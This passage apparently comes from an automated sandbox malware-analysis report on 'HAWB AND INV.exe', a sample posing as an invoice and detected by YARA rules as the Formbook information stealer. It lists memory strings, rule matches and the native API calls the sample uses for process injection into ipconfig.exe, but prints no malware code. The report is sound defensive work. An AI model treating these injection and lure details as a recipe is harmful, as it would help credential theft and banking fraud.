          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 0000000B.00000000.417611196.000000000B1A6000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: powershell.exe, 00000002.00000002.529584600.00000000049DE000.00000004.00000001.sdmp, powershell.exe, 00000004.00000003.464881292.0000000008023000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: HAWB AND INV.exeString found in binary or memory: https://github.com/unguest
          Source: HAWB AND INV.exeString found in binary or memory: https://github.com/unguest9WinForms_RecursiveFormCreate5WinForms_SeeInnerExceptionGProperty
          Source: ipconfig.exe, 00000017.00000002.598011304.0000000003162000.00000004.00000001.sdmpString found in binary or memory: https://go.cpanel.net/privacy
          Source: powershell.exe, 00000004.00000003.477109333.0000000005AE1000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000002.00000003.453197763.0000000005250000.00000004.00000001.sdmpString found in binary or memory: https://go.microX%
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000017.00000002.593621716.0000000000850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.482267255.00000000014E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.591815076.0000000000110000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.350474951.0000000003CE9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.HAWB AND INV.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.HAWB AND INV.exe.3d81880.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004181B0 NtCreateFile,10_2_004181B0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00418260 NtReadFile,10_2_00418260
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004182E0 NtClose,10_2_004182E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00418390 NtAllocateVirtualMemory,10_2_00418390
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_004181AA NtCreateFile,10_2_004181AA
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041825A NtReadFile,10_2_0041825A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_01219910
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012199A0 NtCreateSection,LdrInitializeThunk,10_2_012199A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219860 NtQuerySystemInformation,LdrInitializeThunk,10_2_01219860
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219840 NtDelayExecution,LdrInitializeThunk,10_2_01219840
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012198F0 NtReadVirtualMemory,LdrInitializeThunk,10_2_012198F0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A20 NtResumeThread,LdrInitializeThunk,10_2_01219A20
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A00 NtProtectVirtualMemory,LdrInitializeThunk,10_2_01219A00
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A50 NtCreateFile,LdrInitializeThunk,10_2_01219A50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219540 NtReadFile,LdrInitializeThunk,10_2_01219540
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012195D0 NtClose,LdrInitializeThunk,10_2_012195D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219710 NtQueryInformationToken,LdrInitializeThunk,10_2_01219710
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012197A0 NtUnmapViewOfSection,LdrInitializeThunk,10_2_012197A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219780 NtMapViewOfSection,LdrInitializeThunk,10_2_01219780
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219FE0 NtCreateMutant,LdrInitializeThunk,10_2_01219FE0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219660 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_01219660
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012196E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_012196E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219950 NtQueueApcThread,10_2_01219950
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012199D0 NtCreateProcessEx,10_2_012199D0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219820 NtEnumerateKey,10_2_01219820
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121B040 NtSuspendThread,10_2_0121B040
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012198A0 NtWriteVirtualMemory,10_2_012198A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219B00 NtSetValueKey,10_2_01219B00
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A3B0 NtGetContextThread,10_2_0121A3B0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A10 NtQuerySection,10_2_01219A10
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219A80 NtOpenDirectoryObject,10_2_01219A80
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219520 NtWaitForSingleObject,10_2_01219520
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121AD30 NtSetContextThread,10_2_0121AD30
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219560 NtWriteFile,10_2_01219560
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012195F0 NtQueryInformationFile,10_2_012195F0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219730 NtQueryVirtualMemory,10_2_01219730
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A710 NtOpenProcessToken,10_2_0121A710
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219760 NtOpenProcess,10_2_01219760
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0121A770 NtOpenThread,10_2_0121A770
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219770 NtSetInformationFile,10_2_01219770
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219610 NtEnumerateValueKey,10_2_01219610
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219670 NtQueryInformationProcess,10_2_01219670
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_01219650 NtQueryValueKey,10_2_01219650
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012196D0 NtCreateKey,10_2_012196D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A50 NtCreateFile,LdrInitializeThunk,23_2_02B19A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19860 NtQuerySystemInformation,LdrInitializeThunk,23_2_02B19860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19840 NtDelayExecution,LdrInitializeThunk,23_2_02B19840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B199A0 NtCreateSection,LdrInitializeThunk,23_2_02B199A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19910 NtAdjustPrivilegesToken,LdrInitializeThunk,23_2_02B19910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B196E0 NtFreeVirtualMemory,LdrInitializeThunk,23_2_02B196E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B196D0 NtCreateKey,LdrInitializeThunk,23_2_02B196D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19780 NtMapViewOfSection,LdrInitializeThunk,23_2_02B19780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19FE0 NtCreateMutant,LdrInitializeThunk,23_2_02B19FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19710 NtQueryInformationToken,LdrInitializeThunk,23_2_02B19710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B195D0 NtClose,LdrInitializeThunk,23_2_02B195D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19540 NtReadFile,LdrInitializeThunk,23_2_02B19540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A80 NtOpenDirectoryObject,23_2_02B19A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A20 NtResumeThread,23_2_02B19A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A10 NtQuerySection,23_2_02B19A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19A00 NtProtectVirtualMemory,23_2_02B19A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A3B0 NtGetContextThread,23_2_02B1A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19B00 NtSetValueKey,23_2_02B19B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B198A0 NtWriteVirtualMemory,23_2_02B198A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B198F0 NtReadVirtualMemory,23_2_02B198F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19820 NtEnumerateKey,23_2_02B19820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1B040 NtSuspendThread,23_2_02B1B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B199D0 NtCreateProcessEx,23_2_02B199D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19950 NtQueueApcThread,23_2_02B19950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19610 NtEnumerateValueKey,23_2_02B19610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19670 NtQueryInformationProcess,23_2_02B19670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19660 NtAllocateVirtualMemory,23_2_02B19660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19650 NtQueryValueKey,23_2_02B19650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B197A0 NtUnmapViewOfSection,23_2_02B197A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19730 NtQueryVirtualMemory,23_2_02B19730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A710 NtOpenProcessToken,23_2_02B1A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1A770 NtOpenThread,23_2_02B1A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19770 NtSetInformationFile,23_2_02B19770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19760 NtOpenProcess,23_2_02B19760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B195F0 NtQueryInformationFile,23_2_02B195F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B1AD30 NtSetContextThread,23_2_02B1AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19520 NtWaitForSingleObject,23_2_02B19520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B19560 NtWriteFile,23_2_02B19560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001281B0 NtCreateFile,23_2_001281B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00128260 NtReadFile,23_2_00128260
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001282E0 NtClose,23_2_001282E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_001281AA NtCreateFile,23_2_001281AA
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012825A NtReadFile,23_2_0012825A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AC3A00_2_012AC3A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AA7580_2_012AA758
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_012AF8380_2_012AF838
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058320B00_2_058320B0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058320C00_2_058320C0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058310380_2_05831038
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831D980_2_05831D98
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05831DF00_2_05831DF0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05830FF40_2_05830FF4
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05833F410_2_05833F41
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05833F500_2_05833F50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058319110_2_05831911
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_058319200_2_05831920
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 0_2_05836A180_2_05836A18
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_02E8E7502_2_02E8E750
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C84F10_2_0041C84F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0040102610_2_00401026
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0040103010_2_00401030
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C1F010_2_0041C1F0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00408C5010_2_00408C50
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041BC3A10_2_0041BC3A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041CD1A10_2_0041CD1A
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C5F310_2_0041C5F3
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041B58410_2_0041B584
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402D8810_2_00402D88
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402D9010_2_00402D90
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041CE7B10_2_0041CE7B
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041BE2610_2_0041BE26
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0041C7D910_2_0041C7D9
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_00402FB010_2_00402FB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011DF90010_2_011DF900
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F412010_2_011F4120
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129100210_2_01291002
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012020A010_2_012020A0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A20A810_2_012A20A8
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011EB09010_2_011EB090
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A28EC10_2_012A28EC
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2B2810_2_012A2B28
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120EBB010_2_0120EBB0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129DBD210_2_0129DBD2
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A22AE10_2_012A22AE
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2D0710_2_012A2D07
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011D0D2010_2_011D0D20
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1D5510_2_012A1D55
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0120258110_2_01202581
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A25DD10_2_012A25DD
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011ED5E010_2_011ED5E0
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011E841F10_2_011E841F
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129D46610_2_0129D466
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A1FF110_2_012A1FF1
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_011F6E3010_2_011F6E30
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_0129D61610_2_0129D616
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: 10_2_012A2EF710_2_012A2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA22AE23_2_02BA22AE
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0EBB023_2_02B0EBB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9DBD223_2_02B9DBD2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2B2823_2_02BA2B28
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B020A023_2_02B020A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA20A823_2_02BA20A8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AEB09023_2_02AEB090
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA28EC23_2_02BA28EC
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BAE82423_2_02BAE824
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9100223_2_02B91002
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF412023_2_02AF4120
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02ADF90023_2_02ADF900
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2EF723_2_02BA2EF7
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AF6E3023_2_02AF6E30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9D61623_2_02B9D616
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1FF123_2_02BA1FF1
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AE841F23_2_02AE841F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B9D46623_2_02B9D466
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02B0258123_2_02B02581
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AED5E023_2_02AED5E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA25DD23_2_02BA25DD
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02AD0D2023_2_02AD0D20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA2D0723_2_02BA2D07
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_02BA1D5523_2_02BA1D55
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C84F23_2_0012C84F
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012BC3A23_2_0012BC3A
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00118C5023_2_00118C50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112D9023_2_00112D90
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012B58423_2_0012B584
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112D8823_2_00112D88
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C5F323_2_0012C5F3
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_00112FB023_2_00112FB0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 23_2_0012C7D923_2_0012C7D9
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 02ADB150 appears 35 times
          Source: C:\Users\user\Desktop\HAWB AND INV.exeCode function: String function: 011DB150 appears 35 times
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmpBinary or memory string: originalfilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.364582224.000000000BE40000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363402350.00000000060D0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.347517443.0000000002CE1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameSimpleUI.dll( vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 00000000.00000002.363989831.000000000BD40000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs HAWB AND INV.exe
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilename vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.485481654.0000000003107000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HAWB AND INV.exe
          Source: HAWB AND INV.exe, 0000000A.00000002.479054770.00000000012CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HAWB AND INV.exe
          Source: HAWB AND INV.exeBinary or memory string: OriginalFilenameTOKENPRIMARYGROUP.exe6 vs HAWB AND INV.exe
          Source: HAWB AND INV.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.473823367.0000000000C50000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000017.00000002.593665337.0000000000880000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
